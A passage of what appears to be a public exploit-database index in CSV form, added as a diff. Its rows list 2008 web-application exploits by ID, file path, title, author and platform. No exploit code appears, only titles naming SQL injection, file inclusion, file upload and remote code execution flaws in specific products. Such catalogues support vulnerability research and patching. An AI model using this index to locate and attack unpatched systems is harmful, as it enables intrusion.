Scripting",2008-06-20,"CWH Underground",webapps,php, +5878,exploits/php/webapps/5878.txt,"emuCMS 0.3 - 'cat_id' SQL Injection",2008-06-20,TurkishWarriorr,webapps,php, +5879,exploits/php/webapps/5879.txt,"phpAuction - 'profile.php' SQL Injection (1)",2008-06-20,Mr.SQL,webapps,php, +5880,exploits/php/webapps/5880.txt,"SiteXS CMS 0.1.1 - Arbitrary File Upload / Cross-Site Scripting",2008-06-21,"CWH Underground",webapps,php, +5881,exploits/php/webapps/5881.txt,"@CMS 2.1.1 - SQL Injection",2008-06-21,Mr.SQL,webapps,php, +5882,exploits/php/webapps/5882.txt,"eNews 0.1 - 'delete.php' Arbitrary Delete Post",2008-06-21,"ilker Kandemir",webapps,php, +5883,exploits/php/webapps/5883.txt,"PHP KnowledgeBase Script 2.4 - 'cat_id' SQL Injection",2008-06-21,"S.L TEAM",webapps,php, +5884,exploits/php/webapps/5884.txt,"Aprox CMS Engine 5.1.0.4 - Local File Inclusion",2008-06-21,SkyOut,webapps,php, +5885,exploits/php/webapps/5885.pl,"Scientific Image DataBase 0.41 - Blind SQL Injection",2008-06-21,t0pP8uZz,webapps,php, +5886,exploits/php/webapps/5886.pl,"LaserNet CMS 1.5 - Arbitrary File Upload",2008-06-21,t0pP8uZz,webapps,php, +5887,exploits/php/webapps/5887.pl,"LE.CMS 1.4 - Arbitrary File Upload",2008-06-21,t0pP8uZz,webapps,php, +5888,exploits/php/webapps/5888.txt,"CCLeague Pro 1.2 - Insecure Cookie Authentication",2008-06-21,t0pP8uZz,webapps,php, +5889,exploits/php/webapps/5889.txt,"Online Fantasy Football League (OFFL) 0.2.6 - 'teams.php' SQL Injection",2008-06-21,t0pP8uZz,webapps,php, +5890,exploits/php/webapps/5890.txt,"AJ HYIP ACME - 'news.php' SQL Injection",2008-06-21,"Hussin X",webapps,php, +5892,exploits/php/webapps/5892.txt,"phpAuction 3.2.1 - 'item.php' SQL Injection",2008-06-21,"Hussin X",webapps,php, +5893,exploits/php/webapps/5893.txt,"Joomla! Component EXP Shop - 'catid' SQL Injection",2008-06-22,His0k4,webapps,php, +5894,exploits/asp/webapps/5894.txt,"DUdForum 3.0 - 'iFor' SQL Injection",2008-06-22,Bl@ckbe@rD,webapps,asp, +5895,exploits/php/webapps/5895.txt,"shibby shop 2.2 - Multiple Vulnerabilities",2008-06-22,KnocKout,webapps,php, +5896,exploits/php/webapps/5896.txt,"CMS Mini 0.2.2 - Multiple Local File Inclusions",2008-06-22,"CWH Underground",webapps,php, +5897,exploits/php/webapps/5897.txt,"phpDMCA 1.0.0 - Multiple Remote File Inclusions",2008-06-22,CraCkEr,webapps,php, +5898,exploits/php/webapps/5898.pl,"IGSuite 3.2.4 - Reverse Shell Blind SQL Injection",2008-06-22,"Guido Landi",webapps,php, +5899,exploits/php/webapps/5899.txt,"PageSquid CMS 0.3 Beta - 'index.php' SQL Injection",2008-06-22,"CWH Underground",webapps,php, +5900,exploits/php/webapps/5900.txt,"RSS-aggregator - 'path' Remote File Inclusion",2008-06-22,"Ghost Hacker",webapps,php, +5901,exploits/php/webapps/5901.txt,"MiGCMS 2.0.5 - Multiple Remote File Inclusions",2008-06-22,CraCkEr,webapps,php, +5902,exploits/php/webapps/5902.txt,"HoMaP-CMS 0.1 - 'plugin_admin.php' Remote File Inclusion",2008-06-22,CraCkEr,webapps,php, +5903,exploits/php/webapps/5903.txt,"HomePH Design 2.10 RC2 - Local File Inclusion / Remote File Inclusion / Cross-Site Scripting",2008-06-22,CraCkEr,webapps,php, +5904,exploits/php/webapps/5904.txt,"Hedgehog-CMS 1.21 - 'header.php' Local File Inclusion",2008-06-22,CraCkEr,webapps,php, +5905,exploits/php/webapps/5905.txt,"cmreams CMS 1.3.1.1 beta2 - Local File Inclusion / Cross-Site Scripting",2008-06-22,CraCkEr,webapps,php, +5906,exploits/php/webapps/5906.txt,"odars CMS 1.0.2 - Remote File Inclusion",2008-06-22,CraCkEr,webapps,php, +5907,exploits/php/webapps/5907.pl,"emuCMS 0.3 - 'FCKeditor' Arbitrary File Upload",2008-06-23,Stack,webapps,php, +5908,exploits/php/webapps/5908.txt,"HoMaP-CMS 0.1 - 'go' SQL Injection",2008-06-23,SxCx,webapps,php, +5909,exploits/php/webapps/5909.pl,"BlogPHP 2.0 - Privilege Escalation / SQL Injection",2008-06-23,Cod3rZ,webapps,php, +5910,exploits/php/webapps/5910.txt,"Ready2Edit - 'menuid' SQL Injection",2008-06-23,Mr.SQL,webapps,php, +5911,exploits/php/webapps/5911.txt,"ResearchGuide 0.5 - 'id' SQL Injection",2008-06-23,dun,webapps,php, +5912,exploits/asp/webapps/5912.txt,"MVC-Web CMS 1.0/1.2 - 'newsid' SQL Injection",2008-06-23,Bl@ckbe@rD,webapps,asp, +5913,exploits/php/webapps/5913.txt,"MyBlog: PHP and MySQL Blog/CMS software - SQL Injection / Cross-Site Scripting",2008-06-23,"CWH Underground",webapps,php, +5914,exploits/php/webapps/5914.txt,"Demo4 CMS - 'id' SQL Injection",2008-06-23,"CWH Underground",webapps,php, +5915,exploits/php/webapps/5915.txt,"Joomla! Component FacileForms 1.4.4 - Remote File Inclusion",2008-06-23,Kacak,webapps,php, +5916,exploits/php/webapps/5916.txt,"Dagger CMS 2008 - 'dir_inc' Remote File Inclusion",2008-06-23,CraCkEr,webapps,php, +5917,exploits/php/webapps/5917.txt,"TinXCMS 1.1 - Local File Inclusion / Cross-Site Scripting",2008-06-23,CraCkEr,webapps,php, +5919,exploits/php/webapps/5919.txt,"mm chat 1.5 - Local File Inclusion / Cross-Site Scripting",2008-06-23,CraCkEr,webapps,php, +5920,exploits/php/webapps/5920.txt,"ourvideo CMS 9.5 - Local File Inclusion / Remote File Inclusion / Cross-Site Scripting",2008-06-23,CraCkEr,webapps,php, +5921,exploits/php/webapps/5921.txt,"cmsWorks 2.2 RC4 - 'mod_root' Remote File Inclusion",2008-06-23,CraCkEr,webapps,php, +5922,exploits/php/webapps/5922.php,"cmsWorks 2.2 RC4 - 'FCKeditor' Arbitrary File Upload",2008-06-23,Stack,webapps,php, +5923,exploits/php/webapps/5923.pl,"Demo4 CMS 1b - 'FCKeditor' Arbitrary File Upload",2008-06-23,Stack,webapps,php, +5924,exploits/php/webapps/5924.txt,"Relative Real Estate Systems 3.0 - 'listing_id' SQL Injection",2008-06-24,K-159,webapps,php, +5925,exploits/php/webapps/5925.txt,"ShareCMS 0.1 - Multiple SQL Injections",2008-06-24,"CWH Underground",webapps,php, +5927,exploits/asp/webapps/5927.txt,"DUcalendar 1.0 - 'iEve' SQL Injection",2008-06-24,Bl@ckbe@rD,webapps,asp, +5928,exploits/php/webapps/5928.txt,"HiveMaker Directory 1.0.2 - 'cid' SQL Injection",2008-06-24,"security fears team",webapps,php, +5929,exploits/php/webapps/5929.txt,"E-topbiz ViralDX 2.07 - 'bannerid' SQL Injection",2008-06-24,"Hussin X",webapps,php, +5930,exploits/php/webapps/5930.txt,"Link ADS 1 - 'linkid' SQL Injection",2008-06-24,"Hussin X",webapps,php, +5931,exploits/php/webapps/5931.pl,"TOKOKITA - 'produk_id' SQL Injection",2008-06-24,k1tk4t,webapps,php, +5932,exploits/php/webapps/5932.txt,"Webdevindo-CMS 0.1 - 'hal' SQL Injection",2008-06-25,"CWH Underground",webapps,php, +5933,exploits/php/webapps/5933.txt,"mUnky 0.0.1 - 'zone' Local File Inclusion",2008-06-25,StAkeR,webapps,php, +5934,exploits/php/webapps/5934.txt,"Jokes & Funny Pics Script - 'sb_jokeid' SQL Injection",2008-06-25,"Hussin X",webapps,php, +5935,exploits/php/webapps/5935.pl,"Mambo Component Articles - 'artid' Blind SQL Injection",2008-06-25,"Ded MustD!e",webapps,php, +5936,exploits/php/webapps/5936.txt,"Page Manager CMS 2006-02-04 - Arbitrary File Upload",2008-06-25,"CWH Underground",webapps,php, +5937,exploits/php/webapps/5937.txt,"MyPHP CMS 0.3.1 - 'pid' SQL Injection",2008-06-25,"CWH Underground",webapps,php, +5938,exploits/php/webapps/5938.php,"PHPmotion 2.0 - 'update_profile.php' Arbitrary File Upload",2008-06-25,EgiX,webapps,php, +5939,exploits/php/webapps/5939.txt,"Joomla! Component netinvoice 1.2.0 SP1 - SQL Injection",2008-06-25,His0k4,webapps,php, +5940,exploits/php/webapps/5940.txt,"Keller Web Admin CMS 0.94 Pro - Local File Inclusion (1)",2008-06-26,"CWH Underground",webapps,php, +5941,exploits/php/webapps/5941.txt,"polypager 1.0rc2 - SQL Injection / Cross-Site Scripting",2008-06-26,"CWH Underground",webapps,php, +5942,exploits/php/webapps/5942.txt,"PHP-Fusion Mod Kroax 4.42 - 'category' SQL Injection",2008-06-26,boom3rang,webapps,php, +5944,exploits/php/webapps/5944.txt,"Galmeta Post CMS 0.2 - Multiple Local File Inclusions",2008-06-26,"CWH Underground",webapps,php, +5945,exploits/php/webapps/5945.txt,"Seagull PHP Framework 0.6.4 - 'FCKeditor' Arbitrary File Upload",2008-06-26,EgiX,webapps,php, +5946,exploits/php/webapps/5946.txt,"Riddles Complete Website 1.2.1 - 'riddleid' SQL Injection",2008-06-26,InjEctOr5,webapps,php, +5947,exploits/php/webapps/5947.txt,"Tips Complete Website 1.2.0 - 'tipid' SQL Injection",2008-06-26,InjEctOr5,webapps,php, +5948,exploits/php/webapps/5948.txt,"Easysitenetwork Jokes Complete Website 2.1.3 - 'jokeid' SQL Injection",2008-06-26,InjEctOr5,webapps,php, +5949,exploits/php/webapps/5949.txt,"Drinks Complete Website 2.1.0 - 'drinkid' SQL Injection",2008-06-26,InjEctOr5,webapps,php, +5950,exploits/php/webapps/5950.txt,"Cheats Complete Website 1.1.1 - 'itemID' SQL Injection",2008-06-26,InjEctOr5,webapps,php, +5952,exploits/php/webapps/5952.txt,"phpBLASTER CMS 1.0 RC1 - Multiple Local File Inclusions",2008-06-26,CraCkEr,webapps,php, +5954,exploits/php/webapps/5954.txt,"A+ PHP Scripts - Nms Insecure Cookie Handling",2008-06-26,"Virangar Security",webapps,php, +5955,exploits/php/webapps/5955.txt,"Orca 2.0/2.0.2 - 'params.php?gConf[dir][layouts]' Remote File Inclusion",2008-06-26,Ciph3r,webapps,php, +5956,exploits/php/webapps/5956.txt,"Keller Web Admin CMS 0.94 Pro - Local File Inclusion (2)",2008-06-26,StAkeR,webapps,php, +5957,exploits/php/webapps/5957.txt,"OTManager CMS 24a - Local File Inclusion / Cross-Site Scripting",2008-06-27,"CWH Underground",webapps,php, +5958,exploits/php/webapps/5958.txt,"W1L3D4 philboard 1.2 - Blind SQL Injection / Cross-Site Scripting",2008-06-27,Bl@ckbe@rD,webapps,php, +5959,exploits/php/webapps/5959.txt,"OTManager CMS 2.4 - Insecure Cookie Handling",2008-06-27,"Virangar Security",webapps,php, +5960,exploits/php/webapps/5960.txt,"SePortal 2.4 - 'poll_id' SQL Injection",2008-06-27,Mr.SQL,webapps,php, +5961,exploits/php/webapps/5961.txt,"PHP-Fusion Mod Classifieds - 'lid' SQL Injection",2008-06-27,boom3rang,webapps,php, +5962,exploits/php/webapps/5962.txt,"poweraward 1.1.0 rc1 - Local File Inclusion / Cross-Site Scripting",2008-06-28,CraCkEr,webapps,php, +5963,exploits/php/webapps/5963.txt,"Joomla! Component jabode - 'id' SQL Injection",2008-06-28,His0k4,webapps,php, +5964,exploits/php/webapps/5964.txt,"Online Booking Manager 2.2 - 'id' SQL Injection",2008-06-28,"Hussin X",webapps,php, +5965,exploits/php/webapps/5965.txt,"Joomla! Component beamospetition - SQL Injection",2008-06-28,His0k4,webapps,php, +5966,exploits/php/webapps/5966.pl,"Joomla! Component Xe webtv - 'id' Blind SQL Injection",2008-06-28,His0k4,webapps,php, +5967,exploits/php/webapps/5967.txt,"SebracCMS 0.4 - Multiple SQL Injections",2008-06-28,shinmai,webapps,php, +5969,exploits/php/webapps/5969.txt,"AcmlmBoard 1.A2 - 'pow' SQL Injection",2008-06-30,anonymous,webapps,php, +5970,exploits/php/webapps/5970.txt,"eSHOP100 - 'SUB' SQL Injection",2008-06-30,JuDge,webapps,php, +5971,exploits/php/webapps/5971.pl,"BareNuked CMS 1.1.0 - Arbitrary Add Admin",2008-06-30,"CWH Underground",webapps,php, +5972,exploits/php/webapps/5972.txt,"RCM Revision Web Development - 'products.php' SQL Injection",2008-06-30,Niiub,webapps,php, +5973,exploits/php/webapps/5973.php,"Pivot 1.40.5 - Dreamwind 'load_template()' Credentials Disclosure",2008-06-30,Nine:Situations:Group,webapps,php, +5974,exploits/php/webapps/5974.txt,"Catviz 0.4.0 beta1 - Multiple SQL Injections",2008-06-30,anonymous,webapps,php, +5975,exploits/php/webapps/5975.txt,"MyBloggie 2.1.6 - Multiple SQL Injections",2008-06-30,"Jesper Jurcenoks",webapps,php, +5976,exploits/php/webapps/5976.pl,"AShop Deluxe 4.x - 'catalogue.php' SQL Injection",2008-06-30,n0c0py,webapps,php, +5977,exploits/php/webapps/5977.txt,"pSys 0.7.0 Alpha - 'chatbox.php' SQL Injection",2008-06-30,DNX,webapps,php, +5980,exploits/php/webapps/5980.txt,"Mambo Component N-Gallery - Multiple SQL Injections",2008-06-30,AlbaniaN-[H],webapps,php, +5981,exploits/php/webapps/5981.txt,"HIOX Banner Rotator 1.3 - 'hm' Remote File Inclusion",2008-06-30,"Ghost Hacker",webapps,php, +5982,exploits/php/webapps/5982.txt,"PHP-Agenda 2.2.4 - 'index.php' Local File Inclusion",2008-07-01,StAkeR,webapps,php, +5983,exploits/php/webapps/5983.txt,"CAT2 - 'spaw_root' Local File Inclusion",2008-07-01,StAkeR,webapps,php, +5984,exploits/php/webapps/5984.txt,"Sisplet CMS 2008-01-24 - 'id' SQL Injection",2008-07-01,"CWH Underground",webapps,php, +5985,exploits/php/webapps/5985.txt,"VanGogh Web CMS 0.9 - 'article_ID' SQL Injection",2008-07-01,"CWH Underground",webapps,php, +5986,exploits/php/webapps/5986.php,"PHP-Nuke Platinium 7.6.b.5 - Remote Code Execution",2008-07-01,"Charles Fol",webapps,php, +5987,exploits/php/webapps/5987.txt,"Efestech Shop 2.0 - 'cat_id' SQL Injection",2008-07-01,Kacak,webapps,php, +5988,exploits/php/webapps/5988.txt,"plx Ad Trader 3.2 - 'adid' SQL Injection",2008-07-01,"Hussin X",webapps,php, +5989,exploits/php/webapps/5989.txt,"Joomla! Component versioning 1.0.2 - 'id' SQL Injection",2008-07-01,"DarkMatter Crew",webapps,php, +5990,exploits/php/webapps/5990.txt,"Joomla! Component mygallery - 'cid' SQL Injection",2008-07-01,Houssamix,webapps,php, +5991,exploits/php/webapps/5991.txt,"XchangeBoard 1.70 - 'boardID' SQL Injection",2008-07-02,haZl0oh,webapps,php, +5992,exploits/php/webapps/5992.txt,"CMS little 0.0.1 - 'template' Local File Inclusion",2008-07-02,"CWH Underground",webapps,php, +5993,exploits/php/webapps/5993.txt,"Joomla! Component Brightcode Weblinks - 'catid' SQL Injection",2008-07-02,His0k4,webapps,php, +5994,exploits/php/webapps/5994.pl,"Joomla! Component QuickTime VR 0.1 - SQL Injection",2008-07-02,Houssamix,webapps,php, +5995,exploits/php/webapps/5995.pl,"Joomla! Component is 1.0.1 - Multiple SQL Injections",2008-07-02,Houssamix,webapps,php, +5996,exploits/php/webapps/5996.txt,"PHPortal 1.2 - Multiple Remote File Inclusions",2008-07-02,Ciph3r,webapps,php, +5997,exploits/php/webapps/5997.pl,"CMS WebBlizzard - 'index.php' Blind SQL Injection",2008-07-03,Bl@ckbe@rD,webapps,php, +5998,exploits/php/webapps/5998.txt,"PHPwebnews 0.2 MySQL Edition - 'id_kat' SQL Injection",2008-07-03,storm,webapps,php, +5999,exploits/php/webapps/5999.txt,"PHPwebnews 0.2 MySQL Edition - 'det' SQL Injection",2008-07-03,"Virangar Security",webapps,php, +6000,exploits/php/webapps/6000.txt,"pHNews CMS Alpha 1 - Local File Inclusion",2008-07-03,CraCkEr,webapps,php, +6001,exploits/php/webapps/6001.txt,"1024 CMS 1.4.4 - Multiple Local/Remote File Inclusions",2008-07-04,DSecRG,webapps,php, +6002,exploits/php/webapps/6002.pl,"Joomla! Component altas 1.0 - Multiple SQL Injections",2008-07-04,Houssamix,webapps,php, +6003,exploits/php/webapps/6003.txt,"Joomla! Component DBQuery 1.4.1.1 - Remote File Inclusion",2008-07-04,SsEs,webapps,php, +6005,exploits/php/webapps/6005.php,"Site@School 2.4.10 - 'FCKeditor' Session Hijacking / Arbitrary File Upload",2008-07-04,EgiX,webapps,php, +6006,exploits/php/webapps/6006.php,"Thelia 1.3.5 - Multiple Vulnerabilities",2008-07-05,BlackH,webapps,php, +6007,exploits/php/webapps/6007.txt,"Kasseler CMS 1.3.0 - Local File Inclusion / Cross-Site Scripting",2008-07-05,Cr@zy_King,webapps,php, +6008,exploits/php/webapps/6008.php,"ImperialBB 2.3.5 - Arbitrary File Upload",2008-07-05,PHPLizardo,webapps,php, +6009,exploits/php/webapps/6009.pl,"Fuzzylime CMS 3.01 - Remote Command Execution",2008-07-05,Ams,webapps,php, +6010,exploits/php/webapps/6010.txt,"XPOZE Pro 3.06 - 'uid' SQL Injection",2008-07-06,"HIva Team",webapps,php, +6011,exploits/php/webapps/6011.txt,"ContentNow 1.4.1 - Arbitrary File Upload / Cross-Site Scripting",2008-07-06,"CWH Underground",webapps,php, +6014,exploits/php/webapps/6014.txt,"SmartPPC Pay Per Click Script - 'idDirectory' Blind SQL Injection (1)",2008-07-07,Hamtaro,webapps,php, +6015,exploits/php/webapps/6015.txt,"WebXell Editor 0.1.3 - Arbitrary File Upload",2008-07-07,"CWH Underground",webapps,php, +6016,exploits/php/webapps/6016.pl,"Fuzzylime CMS 3.01a - 'file' Local File Inclusion",2008-07-07,Cod3rZ,webapps,php, +6017,exploits/php/webapps/6017.pl,"Triton CMS Pro 1.06 - 'x-forwarded-for' Blind SQL Injection",2008-07-07,girex,webapps,php, +6018,exploits/php/webapps/6018.pl,"QNX Neutrino 0.8.4 Atomic Edition - Remote Code Execution",2008-07-07,Ams,webapps,php, +6019,exploits/php/webapps/6019.pl,"SmartPPC Pay Per Click Script - 'idDirectory' Blind SQL Injection (2)",2008-07-07,ka0x,webapps,php, +6021,exploits/php/webapps/6021.txt,"Mole Group Hotel Script 1.0 - SQL Injection",2008-07-08,t0pP8uZz,webapps,php, +6022,exploits/php/webapps/6022.txt,"Mole Group Real Estate Script 1.1 - SQL Injection",2008-07-08,t0pP8uZz,webapps,php, +6023,exploits/php/webapps/6023.pl,"BrewBlogger 2.1.0.1 - Arbitrary Add Admin",2008-07-08,"CWH Underground",webapps,php, +6024,exploits/php/webapps/6024.txt,"Boonex Dolphin 6.1.2 - Multiple Remote File Inclusions",2008-07-08,RoMaNcYxHaCkEr,webapps,php, +6025,exploits/php/webapps/6025.txt,"Joomla! Component Content 1.0.0 - 'itemID' SQL Injection",2008-07-08,unknown_styler,webapps,php, +6026,exploits/linux/webapps/6026.pl,"Fonality trixbox - 'langChoice' Local File Inclusion (connect-back) (2)",2008-07-09,"Jean-Michel BESNARD",webapps,linux,80 +6027,exploits/php/webapps/6027.txt,"Mole Group Last Minute Script 4.0 - SQL Injection",2008-07-08,t0pP8uZz,webapps,php, +6028,exploits/php/webapps/6028.txt,"BoonEx Ray 3.5 - 'sIncPath' Remote File Inclusion",2008-07-08,RoMaNcYxHaCkEr,webapps,php, +6033,exploits/php/webapps/6033.pl,"AuraCMS 2.2.2 - '/pages_data.php' Arbitrary Edit/Add/Delete",2008-07-09,k1tk4t,webapps,php, +6034,exploits/php/webapps/6034.txt,"DreamPics Builder - 'page' SQL Injection",2008-07-09,"Hussin X",webapps,php, +6035,exploits/php/webapps/6035.txt,"DreamNews Manager - 'id' SQL Injection",2008-07-10,"Hussin X",webapps,php, +6036,exploits/php/webapps/6036.txt,"gapicms 9.0.2 - 'dirDepth' Remote File Inclusion",2008-07-10,"Ghost Hacker",webapps,php, +6037,exploits/php/webapps/6037.txt,"phpDatingClub 3.7 - 'website.php' Local File Inclusion",2008-07-10,S.W.A.T.,webapps,php, +6040,exploits/php/webapps/6040.txt,"File Store PRO 3.2 - Multiple Blind SQL Injections",2008-07-11,"Nu Am Bani",webapps,php, +6041,exploits/php/webapps/6041.txt,"facebook newsroom CMS 0.5.0 Beta 1 - Remote File Inclusion",2008-07-11,Ciph3r,webapps,php, +6042,exploits/php/webapps/6042.txt,"Wysi Wiki Wyg 1.0 - Local File Inclusion / Cross-Site Scripting / PHPInfo",2008-10-20,StAkeR,webapps,php, +6044,exploits/php/webapps/6044.txt,"Million Pixels 3 - 'id_cat' SQL Injection",2008-07-11,"Hussin X",webapps,php, +6047,exploits/php/webapps/6047.txt,"Maian Cart 1.1 - Insecure Cookie Handling",2008-07-12,Saime,webapps,php, +6048,exploits/php/webapps/6048.txt,"Maian Events 2.0 - Insecure Cookie Handling",2008-07-12,Saime,webapps,php, +6049,exploits/php/webapps/6049.txt,"Maian Gallery 2.0 - Insecure Cookie Handling",2008-07-12,Saime,webapps,php, +6050,exploits/php/webapps/6050.txt,"Maian Greetings 2.1 - Insecure Cookie Handling",2008-07-12,Saime,webapps,php, +6051,exploits/php/webapps/6051.txt,"Maian Music 1.0 - Insecure Cookie Handling",2008-07-12,Saime,webapps,php, +6053,exploits/php/webapps/6053.php,"Fuzzylime CMS 3.01 - 'poll' Remote Code Execution (PHP)",2008-07-12,"Inphex & real",webapps,php, +6054,exploits/php/webapps/6054.pl,"Fuzzylime CMS 3.01 - 'poll' Remote Code Execution (Perl)",2008-07-12,"Inphex & real",webapps,php, +6055,exploits/php/webapps/6055.pl,"Joomla! Component n-forms 1.01 - Blind SQL Injection",2008-07-12,"The Moorish",webapps,php, +6056,exploits/php/webapps/6056.txt,"WebCMS Portal Edition - 'id' SQL Injection",2008-07-12,Mr.SQL,webapps,php, +6057,exploits/php/webapps/6057.txt,"jsite 1.0 oe - SQL Injection / Local File Inclusion",2008-07-12,S.W.A.T.,webapps,php, +6058,exploits/php/webapps/6058.txt,"Avlc Forum - 'vlc_forum.php' SQL Injection",2008-07-12,"CWH Underground",webapps,php, +6060,exploits/php/webapps/6060.php,"Fuzzylime CMS 3.01 - 'commrss.php' Remote Code Execution",2008-07-13,"Charles Fol",webapps,php, +6061,exploits/php/webapps/6061.txt,"Maian Guestbook 3.2 - Insecure Cookie Handling",2008-07-13,S.W.A.T.,webapps,php, +6062,exploits/php/webapps/6062.txt,"Maian Links 3.1 - Insecure Cookie Handling",2008-07-13,S.W.A.T.,webapps,php, +6063,exploits/php/webapps/6063.txt,"Maian Recipe 1.2 - Insecure Cookie Handling",2008-07-13,S.W.A.T.,webapps,php, +6064,exploits/php/webapps/6064.txt,"Maian Weblog 4.0 - Insecure Cookie Handling",2008-07-13,S.W.A.T.,webapps,php, +6065,exploits/php/webapps/6065.txt,"Maian Uploader 4.0 - Insecure Cookie Handling",2008-07-13,S.W.A.T.,webapps,php, +6066,exploits/php/webapps/6066.txt,"Maian Search 1.1 - Insecure Cookie Handling",2008-07-13,S.W.A.T.,webapps,php, +6067,exploits/php/webapps/6067.pl,"Ultrastats 0.2.142 - 'players-detail.php' Blind SQL Injection",2008-07-13,DNX,webapps,php, +6068,exploits/php/webapps/6068.txt,"MFORUM 0.1a - Arbitrary Add Admin",2008-07-13,"CWH Underground",webapps,php, +6069,exploits/php/webapps/6069.txt,"ITechBids 7.0 gold - Cross-Site Scripting / SQL Injection",2008-07-13,Encrypt3d.M!nd,webapps,php, +6070,exploits/php/webapps/6070.php,"Scripteen Free Image Hosting Script 1.2 - 'cookie' Pass Grabber",2008-07-13,RMx,webapps,php, +6071,exploits/php/webapps/6071.txt,"CodeDB 1.1.1 - 'list.php' Local File Inclusion",2008-07-14,cOndemned,webapps,php, +6073,exploits/php/webapps/6073.txt,"bilboblog 2.1 - Multiple Vulnerabilities",2008-07-14,BlackH,webapps,php, +6074,exploits/php/webapps/6074.txt,"Pluck CMS 4.5.1 (Windows) - 'blogpost' Local File Inclusion",2008-07-14,BugReport.IR,webapps,php, +6075,exploits/php/webapps/6075.txt,"Galatolo Web Manager 1.3a - Cross-Site Scripting / SQL Injection",2008-07-15,StAkeR,webapps,php, +6076,exploits/php/webapps/6076.txt,"pSys 0.7.0 Alpha - Multiple Remote File Inclusions",2008-07-15,RoMaNcYxHaCkEr,webapps,php, +6078,exploits/php/webapps/6078.txt,"Pragyan CMS 2.6.2 - 'sourceFolder' Remote File Inclusion",2008-07-15,N3TR00T3R,webapps,php, +6079,exploits/php/webapps/6079.txt,"Comdev Web Blogger 4.1.3 - 'arcmonth' SQL Injection",2008-07-15,K-159,webapps,php, +6080,exploits/php/webapps/6080.txt,"PHP Help Agent 1.1 - 'content' Local File Inclusion",2008-07-15,BeyazKurt,webapps,php, +6081,exploits/php/webapps/6081.txt,"Galatolo Web Manager 1.3a - Insecure Cookie Handling",2008-07-15,"Virangar Security",webapps,php, +6082,exploits/php/webapps/6082.txt,"PhotoPost vBGallery 2.4.2 - Arbitrary File Upload",2008-07-15,"Cold Zero",webapps,php, +6084,exploits/php/webapps/6084.txt,"HockeySTATS Online 2.0 - Multiple SQL Injections",2008-07-15,Mr.SQL,webapps,php, +6085,exploits/php/webapps/6085.pl,"PHPizabi 0.848b C1 HFP1 - Remote Code Execution",2008-07-16,Inphex,webapps,php, +6086,exploits/php/webapps/6086.txt,"Joomla! Component DT Register - SQL Injection",2008-07-16,His0k4,webapps,php, +6087,exploits/php/webapps/6087.txt,"Alstrasoft Affiliate Network Pro - 'pgm' SQL Injection",2008-07-16,"Hussin X",webapps,php, +6088,exploits/php/webapps/6088.txt,"tplSoccerSite 1.0 - Multiple SQL Injections",2008-07-16,Mr.SQL,webapps,php, +6091,exploits/php/webapps/6091.txt,"PHPHoo3 < 5.2.6 - 'viewCat' SQL Injection",2008-07-17,Mr.SQL,webapps,php, +6092,exploits/php/webapps/6092.txt,"Alstrasoft Video Share Enterprise 4.5.1 - 'UID' SQL Injection",2008-07-17,"Hussin X",webapps,php, +6095,exploits/php/webapps/6095.pl,"Alstrasoft Article Manager Pro 1.6 - Blind SQL Injection",2008-07-17,GoLd_M,webapps,php, +6096,exploits/php/webapps/6096.txt,"preCMS 1 - 'index.php' SQL Injection",2008-07-17,Mr.SQL,webapps,php, +6097,exploits/php/webapps/6097.txt,"Arctic Issue Tracker 2.0.0 - 'filter' SQL Injection (1)",2008-07-17,QTRinux,webapps,php, +6098,exploits/php/webapps/6098.txt,"Aprox CMS Engine 5.1.0.4 - 'index.php' SQL Injection",2008-07-18,Mr.SQL,webapps,php, +6099,exploits/php/webapps/6099.txt,"Siteframe CMS 3.2.3 - 'folder.php' SQL Injection",2008-07-18,n0ne,webapps,php, +6102,exploits/php/webapps/6102.txt,"PHPFootball 1.6 - SQL Injection",2008-07-20,Mr.SQL,webapps,php, +6104,exploits/asp/webapps/6104.pl,"DigiLeave 1.2 - 'book_id' Blind SQL Injection",2008-07-21,Mr.SQL,webapps,asp, +6105,exploits/asp/webapps/6105.pl,"HRS Multi - 'key' Blind SQL Injection",2008-07-21,Mr.SQL,webapps,asp, +6107,exploits/php/webapps/6107.txt,"Interact 2.4.1 - 'help.php' Local File Inclusion",2008-07-21,DSecRG,webapps,php, +6108,exploits/cgi/webapps/6108.pl,"MojoClassifieds 2.0 - Blind SQL Injection",2008-07-21,Mr.SQL,webapps,cgi, +6109,exploits/cgi/webapps/6109.pl,"MojoPersonals - Blind SQL Injection",2008-07-21,Mr.SQL,webapps,cgi, +6110,exploits/cgi/webapps/6110.pl,"MojoJobs - Blind SQL Injection",2008-07-21,Mr.SQL,webapps,cgi, +6111,exploits/cgi/webapps/6111.pl,"MojoAuto - Blind SQL Injection",2008-07-21,Mr.SQL,webapps,cgi, +6112,exploits/php/webapps/6112.txt,"EZWebAlbum - Remote File Disclosure",2008-07-21,"Ghost Hacker",webapps,php, +6113,exploits/php/webapps/6113.pl,"Arctic Issue Tracker 2.0.0 - 'filter' SQL Injection (2)",2008-07-21,ldma,webapps,php, +6114,exploits/php/webapps/6114.txt,"ShopCartDx 4.30 - 'pid' SQL Injection",2008-07-21,Cr@zy_King,webapps,php, +6115,exploits/php/webapps/6115.txt,"EZWebAlbum - Insecure Cookie Handling",2008-07-21,"Virangar Security",webapps,php, +6117,exploits/php/webapps/6117.txt,"YouTube blog 0.1 - Remote File Inclusion / SQL Injection / Cross-Site Scripting",2008-07-22,Unohope,webapps,php, +6119,exploits/asp/webapps/6119.txt,"Pre Survey Poll - 'catid' SQL Injection",2008-07-22,DreamTurk,webapps,asp, +6125,exploits/php/webapps/6125.txt,"Atom Photoblog 1.1.5b1 - 'photoId' SQL Injection",2008-07-24,Mr.SQL,webapps,php, +6126,exploits/php/webapps/6126.txt,"ibase 2.03 - Remote File Disclosure",2008-07-24,Dyshoo,webapps,php, +6127,exploits/php/webapps/6127.html,"WordPress Plugin Download Manager 0.2 - Arbitrary File Upload",2008-07-24,SaO,webapps,php, +6128,exploits/php/webapps/6128.txt,"Live Music Plus 1.1.0 - 'id' SQL Injection",2008-07-24,IRAQI,webapps,php, +6131,exploits/php/webapps/6131.txt,"XRms 1.99.2 - Remote File Inclusion / Cross-Site Scripting / Information Gathering",2008-07-25,AzzCoder,webapps,php, +6132,exploits/php/webapps/6132.txt,"Camera Life 2.6.2 - 'id' SQL Injection",2008-07-25,nuclear,webapps,php, +6133,exploits/php/webapps/6133.txt,"FizzMedia 1.51.2 - SQL Injection",2008-07-25,Mr.SQL,webapps,php, +6134,exploits/php/webapps/6134.txt,"PHPTest 0.6.3 - SQL Injection",2008-07-25,cOndemned,webapps,php, +6135,exploits/asp/webapps/6135.txt,"FipsCMS Light 2.1 - 'r' SQL Injection",2008-07-26,U238,webapps,asp, 